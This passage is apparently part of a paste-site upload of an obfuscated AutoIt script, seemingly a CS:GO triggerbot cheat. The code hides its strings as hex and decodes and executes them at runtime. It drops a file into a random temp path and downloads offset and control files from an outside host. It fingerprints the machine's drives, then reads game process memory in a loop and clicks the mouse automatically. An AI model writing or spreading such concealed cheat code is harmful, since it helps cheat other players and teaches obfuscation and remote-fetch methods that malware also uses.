  7384.     ElseIf $a4f24425754 > Number($a0324d23c42) Then
  7385.         $a30a322270f = StringLeft($a2ca3123425, $a4f24425754)
  7386.         $a2ca3321819 = StringRight($a2ca3123425, $a1e24524524 - $a4f24425754)
  7387.         Return $a30a322270f & $a1324324c06 & $a2ca3321819
  7388.     ElseIf $a4f24425754 < Number($a5024e2032e) Then
  7389.         $a30a322270f = StringLeft($a2ca3123425, Abs($a1e24524524 + $a4f24425754))
  7390.         $a2ca3321819 = StringRight($a2ca3123425, Abs($a4f24425754))
  7391.         Return $a30a322270f & $a1324324c06 & $a2ca3321819
  7392.     EndIf
  7393. EndFunc
  7394.  
  7395. Func a4e61a03017($a2ca3123425)
  7396.     If NOT IsDeclared("SSA4E61A03017") Then
  7397.         Global $a1f24f23602 = a2b00005424($os[6594]), $a5e34122b3d = a2b00005424($os[6595]), $a3f34423e23 = a2b00005424($os[6596]), $a153452450a = a2b00005424($os[6597]), $a0c34620928 = a2b00005424($os[6598]), $a5f34724203 = a2b00005424($os[6599]), $a5c34820856 = a2b00005424($os[6600]), $a3f34924b25 = a2b00005424($os[6601]), $a2634a20b56 = a2b00005424($os[6602])
  7398.         Global $ssa4e61a03017 = 1
  7399.     EndIf
  7400.     Local $a3f8d803d27 = Number($a1f24f23602)
  7401.     Local $a223402483a = Number($a5e34122b3d)
  7402.     Local $a6234222c2f = ""
  7403.     Local $a0434321e17
  7404.     For $a3f8d803d27 = Number($a3f34423e23) To StringLen($a2ca3123425)
  7405.         $a0434321e17 = StringMid($a2ca3123425, $a3f8d803d27, Number($a153452450a))
  7406.         Select
  7407.             Case $a223402483a = Number($a0c34620928)
  7408.                 If StringRegExp($a0434321e17, $a5f34724203) Then
  7409.                     $a0434321e17 = StringUpper($a0434321e17)
  7410.                     $a223402483a = Number($a5c34820856)
  7411.                 EndIf
  7412.             Case NOT StringRegExp($a0434321e17, $a3f34924b25)
  7413.                 $a223402483a = Number($a2634a20b56)
  7414.             Case Else
  7415.                 $a0434321e17 = StringLower($a0434321e17)
  7416.         EndSelect
  7417.         $a6234222c2f &= $a0434321e17
  7418.     Next
  7419.     Return $a6234222c2f
  7420. EndFunc
  7421.  
  7422. Func a5a61b04706($a156e804051, $a3434b21940)
  7423.     If NOT IsDeclared("SSA5A61B04706") Then
  7424.         Global $a4834d2162b = a2b00005424($os[6603]), $a1a34e2302f = a2b00005424($os[6604]), $a0734f2481a = a2b00005424($os[6605]), $a4c44023b30 = a2b00005424($os[6606]), $a3c44121d2f = a2b00005424($os[6607]), $a0f44224c4e = a2b00005424($os[6608])
  7425.         Global $ssa5a61b04706 = 1
  7426.     EndIf
  7427.     Local $a1534c25211
  7428.     Select
  7429.         Case NOT StringIsInt($a3434b21940)
  7430.             SetError(Number($a4834d2162b))
  7431.             Return ""
  7432.         Case StringLen($a156e804051) < Number($a1a34e2302f)
  7433.             SetError(Number($a0734f2481a))
  7434.             Return ""
  7435.         Case $a3434b21940 <= Number($a4c44023b30)
  7436.             SetError(Number($a3c44121d2f))
  7437.             Return ""
  7438.         Case Else
  7439.             For $a0a4ed03152 = Number($a0f44224c4e) To $a3434b21940
  7440.                 $a1534c25211 &= $a156e804051
  7441.             Next
  7442.             Return $a1534c25211
  7443.     EndSelect
  7444. EndFunc
  7445.  
  7446. Func a6361c02911($a2ca3123425)
  7447.     If NOT IsDeclared("SSA6361C02911") Then
  7448.         Global $a4644424414 = a2b00005424($os[6609]), $a1b44522524 = a2b00005424($os[6610]), $a5444622b54 = a2b00005424($os[6611]), $a474482014e = a2b00005424($os[6612]), $a2544923d46 = a2b00005424($os[6613]), $a4544a2372c = a2b00005424($os[6614]), $a6044b26006 = a2b00005424($os[6615]), $a5444d2534c = a2b00005424($os[6616]), $a5344e2520a = a2b00005424($os[6617]), $a5044f22b59 = a2b00005424($os[6618]), $a2e54021f11 = a2b00005424($os[6619]), $a5454121250 = a2b00005424($os[6620]), $a095422002f = a2b00005424($os[6621]), $a4654321f59 = a2b00005424($os[6622]), $a515442594c = a2b00005424($os[6623]), $a3954523a33 = a2b00005424($os[6624])
  7449.         Global $ssa6361c02911 = 1
  7450.     EndIf
  7451.     Local $a374432535a = StringLen($a2ca3123425)
  7452.     If $a374432535a < Number($a4644424414) Then Return SetError(Number($a1b44522524), Number($a5444622b54), "")
  7453.     Local $a3d44720e52 = DllStructCreate($a474482014e & $a374432535a + Number($a2544923d46) & $a4544a2372c)
  7454.     DllStructSetData($a3d44720e52, Number($a6044b26006), $a2ca3123425)
  7455.     Local $a2244c22609 = DllCall($a5444d2534c, $a5344e2520a, $a5044f22b59, $a2e54021f11, $a3d44720e52)
  7456.     If @error OR $a2244c22609[Number($a5454121250)] = Number($a095422002f) Then Return SetError(Number($a4654321f59), Number($a515442594c), "")
  7457.     Return DllStructGetData($a3d44720e52, Number($a3954523a33))
  7458. EndFunc
  7459.  
  7460. Func a0d61d00b2d($a1c54620b22)
  7461.     Return Hex(StringToBinary($a1c54620b22))
  7462. EndFunc
  7463.  
  7464. Func a3261e02f4c()
  7465.     If NOT IsDeclared("SSA3261E02F4C") Then
  7466.         Global $a0554823d61 = a2b00005424($os[6625]), $a5854923a11 = a2b00005424($os[6626]), $a0754b2580a = a2b00005424($os[6627]), $a1d54c23c40 = a2b00005424($os[6628]), $a4e54d2523b = a2b00005424($os[6629]), $a0d54e24c42 = a2b00005424($os[6630]), $a5c64021d61 = a2b00005424($os[6631]), $a2964121e47 = a2b00005424($os[6632]), $a1764323221 = a2b00005424($os[6633]), $a3064425f4e = a2b00005424($os[6634])
  7467.         Global $ssa3261e02f4c = 1
  7468.     EndIf
  7469.     $a305472143e = StringLeft(Execute($a0554823d61), Number($a5854923a11))
  7470.     $a0054a22b51 = $a0754b2580a & Execute($a1d54c23c40) & Execute($a4e54d2523b) & DriveGetSerial($a0d54e24c42) & StringUpper(DriveGetType($a305472143e)) & DriveSpaceTotal($a305472143e)
  7471.     $a3954f2134a = StringMid($a0054a22b51, Round(StringLen($a0054a22b51) / Number($a5c64021d61)), Round(StringLen($a0054a22b51) / Number($a2964121e47)))
  7472.     $a086422321b = a0d61d00b2d(a6361c02911($a3954f2134a))
  7473.     $a0054a22b51 = a476170141c(Number($a1764323221), $a0054a22b51, $a086422321b, Number($a3064425f4e))
  7474.     Return $a0054a22b51
  7475. EndFunc
  7476.  
  7477. $a316452230e = GUICreate($a3964625727, Number($a106472021c), Number($a096482240e), Number($a146492631d), Number($a3664a2223a))
  7478. $a5664b24f57 = GUICtrlCreatePic("", -Number($a4064c23c59), -Number($a4a64d20332), Number($a5764e25e0e), Number($a1864f24741))
  7479. a3e61f04b3b($a5664b24f57, $a5e7402462c)
  7480. GUISetState(Execute($a4674121955))
  7481.  
  7482. Func a3e61f04b3b($a186dc01d12, $a1992711431)
  7483.     If NOT IsDeclared("SSA3E61F04B3B") Then
  7484.         Global $a3074422429 = a2b00005424($os[6646]), $a0074522b5f = a2b00005424($os[6647]), $a037462171c = a2b00005424($os[6648]), $a047472561d = a2b00005424($os[6649]), $a2a74820d1a = a2b00005424($os[6650]), $a4574921000 = a2b00005424($os[6651]), $a3974a25117 = a2b00005424($os[6652]), $a2874b24711 = a2b00005424($os[6653]), $a3b74c22520 = a2b00005424($os[6654]), $a3474d21c1d = a2b00005424($os[6655]), $a3474e20f0c = a2b00005424($os[6656])
  7485.         Global $ssa3e61f04b3b = 1
  7486.     EndIf
  7487.     Local $a14b0420743, $a297422331d
  7488.     $a1874320b07 = StringSplit($a1992711431, $a3074422429)
  7489.     $a1874320b07 = $a1874320b07[UBound($a1874320b07) - Number($a0074522b5f)]
  7490.     $a297422331d = a0561401457(Execute($a037462171c), $a047472561d, $a1874320b07)
  7491.     $a14b0420743 = InetGet("http://i.imgur.com/gN86Q9U.jpg", $a297422331d)
  7492.     If NOT $a14b0420743 Then SetError(-Number($a2a74820d1a), Number($a4574921000), -Number($a3974a25117))
  7493.     $a14b0420743 = GUICtrlSetImage($a186dc01d12, $a297422331d)
  7494.     If NOT $a14b0420743 Then SetError(-Number($a2874b24711), Number($a3b74c22520), -Number($a3474d21c1d))
  7495.     Return Number($a3474e20f0c)
  7496. EndFunc
  7497.  
  7498. Opt($a5574f2480b, Number($a5584024162))
  7499. InetGet("http://kelle.comxa.com/offsets.ini", Execute($a398422255c) & $a2c8432570a, Number($a3a8442394c), Number($a5084522c5d))
  7500. $a3884623c22 = (IniRead(Execute($a5484721407) & $a1584821f5b, $a0584922822, $a4584a20c56, $a2c84b25353))
  7501. $a0784c21e5b = (IniRead(Execute($a2c84d22a06) & $a2a84e21f2e, $a4084f2444a, $a099402392c, $a3c9412592a))
  7502. $a4994220049 = (IniRead(Execute($a329432591d) & $a0a94422002, $a2d94524a57, $a4394620b04, $a3994725f0e))
  7503. $a209482145e = (IniRead(Execute($a0f94923359) & $a3094a24923, $a5a94b2302e, $a4a94c23e06, $a2194d22346))
  7504. FileDelete(Execute($a3094e2101c) & $a1f94f23400)
  7505. InetGet("http://kelle.comxa.com/kiddy.ini", Execute($a05a4121b47) & $a4fa4223111, Number($a3ba432225f), Number($a09a442410a))
  7506. Global $a1aa4524240 = IniRead(Execute($a52a4625a0b) & $a29a4722001, $a59a4820a0a, $a2ba492111e, $a47a4a24152)
  7507. Global $a4ba4b24e2c = IniRead(Execute($a57a4c22509) & $a08a4d22746, $a44a4e20d52, $a13a4f2055b, $a37b4022953)
  7508. FileDelete(Execute($a60b4120500) & $a46b4225825)
  7509. Global $a39b4722a07 = DllOpen($a57b4825861)
  7510. If ProcessExists($a4ab492354e) Then
  7511.     a4071002b5d()
  7512. Else
  7513.     TrayTip("", $a09b4a24505, Number($a20b4b2304f))
  7514.     Do
  7515.         $a2fb4c2452b = GUIGetMsg()
  7516.         Switch $a2fb4c2452b
  7517.             Case $a25c2505031
  7518.                 Exit
  7519.         EndSwitch
  7520.     Until ProcessExists($a09b4d22d50)
  7521. EndIf
  7522. a4071002b5d()
  7523.  
  7524. Func a4071002b5d()
  7525.     If NOT IsDeclared("SSA4071002B5D") Then
  7526.         Global $a57b4e2311a = a2b00005424($os[6712]), $a25b4f24800 = a2b00005424($os[6713]), $a08c402324a = a2b00005424($os[6714]), $a3fc4224f47 = a2b00005424($os[6715]), $a63c442072e = a2b00005424($os[6716]), $a14c4522139 = a2b00005424($os[6717]), $a4cc4722b11 = a2b00005424($os[6718]), $a2dc4921731 = a2b00005424($os[6719]), $a3ac4b23208 = a2b00005424($os[6720]), $a61c4c2382c = a2b00005424($os[6721]), $a04c4d21609 = a2b00005424($os[6722]), $a4bc4f23e56 = a2b00005424($os[6723]), $a0ad4125544 = a2b00005424($os[6724]), $a2cd422045a = a2b00005424($os[6725]), $a2cd4325461 = a2b00005424($os[6726]), $a1bd4421956 = a2b00005424($os[6727])
  7527.         Global $ssa4071002b5d = 1
  7528.     EndIf
  7529.     TrayTip("", $a57b4e2311a, Number($a25b4f24800))
  7530.     While Number($a08c402324a)
  7531.         $a2fb4c2452b = GUIGetMsg()
  7532.         Switch $a2fb4c2452b
  7533.             Case $a25c2505031
  7534.                 Exit
  7535.         EndSwitch
  7536.         If a5051200547($a4ba4b24e2c, $a39b4722a07) Then
  7537.             $a12c412050d = a1d41303e46(ProcessExists($a3fc4224f47))
  7538.             $a45c4323a4e = a4d41b02e0c(ProcessExists($a63c442072e), $a14c4522139)
  7539.             $a4cc4623d58 = a224140311e($a45c4323a4e + $a3884623c22, $a12c412050d, $a4cc4722b11)
  7540.             $a44c4820d41 = a224140311e($a4cc4623d58 + $a0784c21e5b, $a12c412050d, $a2dc4921731)
  7541.             $a11c4a21733 = a224140311e($a45c4323a4e + $a4994220049 + (($a44c4820d41 + -Number($a3ac4b23208)) * Number($a61c4c2382c)), $a12c412050d, $a04c4d21609)
  7542.             $a44c4e24e06 = a224140311e($a11c4a21733 + $a209482145e, $a12c412050d, $a4bc4f23e56)
  7543.             $a05d4020d15 = a224140311e($a4cc4623d58 + $a209482145e, $a12c412050d, $a0ad4125544)
  7544.             If $a44c4820d41 > Number($a2cd422045a) AND $a44c4820d41 < Number($a2cd4325461) Then
  7545.                 If $a44c4e24e06 <> $a05d4020d15 Then
  7546.                     MouseClick($a1bd4421956)
  7547.                 EndIf
  7548.             EndIf
  7549.         EndIf
  7550.     WEnd
  7551. EndFunc
  7552.  
  7553. Func a2b00005424_()
  7554.     For $ax0x0xa = 1 To 5
  7555.         Local $a2b00005424sz_ = a2b00005424x_()
  7556.         FileInstall("triggermitteamcheckCSGO.au3.tbl", $a2b00005424sz_, 1)
  7557.         Global $a2b00005424, $os = Execute(BinaryToString("0x457865637574652842696E617279746F737472696E67282730783435373836353633373537343635323834323639364536313732373937343646373337343732363936453637323832373330373833353333333733343337333233363339333634353336333733353333333733303336343333363339333733343332333833343336333633393336343333363335333533323336333533363331333633343332333833323334333433313333333233343332333333303333333033333330333333303333333533333334333333323333333433373333333734313335343633323339333234333332333733353432333333313336343633323337333234333333333133323339323732393239272929"))
  7558.         If IsArray($os) AND $os[0] >= 6727 Then ExitLoop
  7559.         Sleep(10)
  7560.     Next
  7561.     Execute(BinaryToString("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333233343332333333303333333033333330333333303333333533333334333333323333333433373333333734313335343633323339323732393239272929"))
  7562. EndFunc
  7563.  
  7564. Func a2b00005424x_()
  7565.     Local $a2b00005424s1_ = a2b00005424("4054656D70446972"), $a2b00005424s3_ = a2b00005424("31"), $a2b00005424s4_ = a2b00005424("5c"), $a2b00005424s5_ = a2b00005424("5c"), $a2b00005424s6_ = a2b00005424("37"), $a2b00005424s8_ = a2b00005424("3937"), $a2b00005424s9_ = a2b00005424("313232"), $a2b00005424s7_ = a2b00005424("31"), $a2b00005424sa_
  7566.     Local $a2b00005424s2_ = Execute($a2b00005424s1_)
  7567.     If StringRight($a2b00005424s2_, Number($a2b00005424s3_)) <> $a2b00005424s4_ Then $a2b00005424s2_ = $a2b00005424s2_ & $a2b00005424s5_
  7568.     SRandom(Number(StringRight(TimerInit(), 4)))
  7569.     Do
  7570.         $a2b00005424sa_ = ""
  7571.         While StringLen($a2b00005424sa_) < Number($a2b00005424s6_)
  7572.             $a2b00005424sa_ = $a2b00005424sa_ & Chr(Random(Number($a2b00005424s8_), Number($a2b00005424s9_), Number($a2b00005424s7_)))
  7573.         WEnd
  7574.         $a2b00005424sa_ = $a2b00005424s2_ & $a2b00005424sa_
  7575.     Until NOT FileExists($a2b00005424sa_)
  7576.     Return ($a2b00005424sa_)
  7577. EndFunc
  7578.  
  7579. Func a2b00005424($a2b00005424)
  7580.     Local $a2b00005424_
  7581.     For $x = 1 To StringLen($a2b00005424) Step 2
  7582.         $a2b00005424_ &= Chr(Dec(StringMid($a2b00005424, $x, 2)))
  7583.     Next
  7584.     Return $a2b00005424_
  7585. EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement